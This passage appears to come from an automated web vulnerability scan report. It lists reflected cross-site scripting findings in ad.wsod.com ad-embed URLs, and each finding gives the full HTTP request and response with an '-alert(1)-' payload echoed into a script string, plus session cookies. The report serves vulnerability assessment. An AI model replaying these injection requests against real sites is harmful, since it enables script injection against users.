Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:50:23 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 14:50:23 GMT; path=/
Set-Cookie: i_1=33:1411:992:100:0:38345:1296399023:L|33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2; expires=Tue, 01-Mar-2011 14:50:23 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 913

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=179898247385db5'-alert(1)-'daab0c4241f&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       function wsod_image() {
       document.writ
...[SNIP]...

5.82. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449** [ASID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449**

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bdd79'-alert(1)-'0f43dad1fc1 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449**;10,1,103;1920;1200;http%3A_@2F_@2Fmoneycentral.redacted_@2Finvestor_@2Fcharts_@2Fchartdl.aspx_@3Fsymbol%3Dindu22b72%2522%3Balert1_@2F_@2F2badde9cef5?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980bdd79'-alert(1)-'0f43dad1fc1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:50:41 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 14:50:41 GMT; path=/
Set-Cookie: i_1=33:1411:992:100:0:38345:1296399041:L|33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2; expires=Tue, 01-Mar-2011 14:50:41 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 913

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980bdd79'-alert(1)-'0f43dad1fc1';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       function wsod_image() {
       document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d7f
...[SNIP]...

5.83. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449** [PG parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449**

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 35aab'-alert(1)-'33a2db030cc was submitted in the PG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449**;10,1,103;1920;1200;http%3A_@2F_@2Fmoneycentral.redacted_@2Finvestor_@2Fcharts_@2Fchartdl.aspx_@3Fsymbol%3Dindu22b72%2522%3Balert1_@2F_@2F2badde9cef5?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1798982473&PG=INV4QD35aab'-alert(1)-'33a2db030cc&ASID=c0c03864f93b446ea43c1039d6665980 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:50:33 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 14:50:33 GMT; path=/
Set-Cookie: i_1=33:1411:790:100:0:38345:1296399033:L|33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2; expires=Tue, 01-Mar-2011 14:50:33 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 917

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1798982473&PG=INV4QD35aab'-alert(1)-'33a2db030cc&ASID=c0c03864f93b446ea43c1039d6665980';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       function wsod_image() {
       document.write('<a href
...[SNIP]...

5.84. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449** [TargetID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449**

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98cf7'-alert(1)-'528bcea4702 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449**;10,1,103;1920;1200;http%3A_@2F_@2Fmoneycentral.redacted_@2Finvestor_@2Fcharts_@2Fchartdl.aspx_@3Fsymbol%3Dindu22b72%2522%3Balert1_@2F_@2F2badde9cef5?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=823120898cf7'-alert(1)-'528bcea4702&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:50:14 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 14:50:14 GMT; path=/
Set-Cookie: i_1=33:1411:992:100:0:38345:1296399014:L|33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2; expires=Tue, 01-Mar-2011 14:50:14 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 913

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=823120898cf7'-alert(1)-'528bcea4702&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       function wsod_image() {
   
...[SNIP]...

5.85. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449** [UIT parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449**

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a704d'-alert(1)-'e0d47f974c4 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449**;10,1,103;1920;1200;http%3A_@2F_@2Fmoneycentral.redacted_@2Finvestor_@2Fcharts_@2Fchartdl.aspx_@3Fsymbol%3Dindu22b72%2522%3Balert1_@2F_@2F2badde9cef5?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=Ga704d'-alert(1)-'e0d47f974c4&TargetID=8231208&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:49:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 14:49:49 GMT; path=/
Set-Cookie: i_1=33:1411:46:100:0:38345:1296398989:L|33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2; expires=Tue, 01-Mar-2011 14:49:49 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 921

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=Ga704d'-alert(1)-'e0d47f974c4&TargetID=8231208&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       function
...[SNIP]...

5.86. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449** [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449**

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95a1b'-alert(1)-'677433aee2f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449**;10,1,103;1920;1200;http%3A_@2F_@2Fmoneycentral.redacted_@2Finvestor_@2Fcharts_@2Fchartdl.aspx_@3Fsymbol%3Dindu22b72%2522%3Balert1_@2F_@2F2badde9cef5?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980&95a1b'-alert(1)-'677433aee2f=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:51:33 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 14:51:33 GMT; path=/
Set-Cookie: i_1=33:1411:793:100:0:38345:1296399093:L|33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2; expires=Tue, 01-Mar-2011 14:51:33 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 920

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980&95a1b'-alert(1)-'677433aee2f=1';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       function wsod_image() {
       document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d
...[SNIP]...

5.87. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473 [&PID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 11fba"-alert(1)-"faae54f86dc was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=801523511fba"-alert(1)-"faae54f86dc&UIT=G&TargetID=8231208&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:49:20 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
to+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296398960**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=801523511fba"-alert(1)-"faae54f86dc&UIT=G&TargetID=8231208&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980">
...[SNIP]...

5.88. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473 [AN parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f424"-alert(1)-"73f0b6789de was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=17989824732f424"-alert(1)-"73f0b6789de&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:50:17 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
d7fd7c0fb6e6a631357/1411.0.js.120x60/1296399017**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=17989824732f424"-alert(1)-"73f0b6789de&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980">
...[SNIP]...

5.89. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473 [ASID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 45b7f"-alert(1)-"150a6e34d9c was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d666598045b7f"-alert(1)-"150a6e34d9c HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:50:35 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
*;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d666598045b7f"-alert(1)-"150a6e34d9c">
...[SNIP]...

5.90. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473 [PG parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 28a9b"-alert(1)-"18d2c882ce5 was submitted in the PG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1798982473&PG=INV4QD28a9b"-alert(1)-"18d2c882ce5&ASID=c0c03864f93b446ea43c1039d6665980 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:50:25 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
e6a631357/1411.0.js.120x60/1296399025**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1798982473&PG=INV4QD28a9b"-alert(1)-"18d2c882ce5&ASID=c0c03864f93b446ea43c1039d6665980">
...[SNIP]...

5.91. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473 [REST URL parameter 2]

Summary

Severity:   High
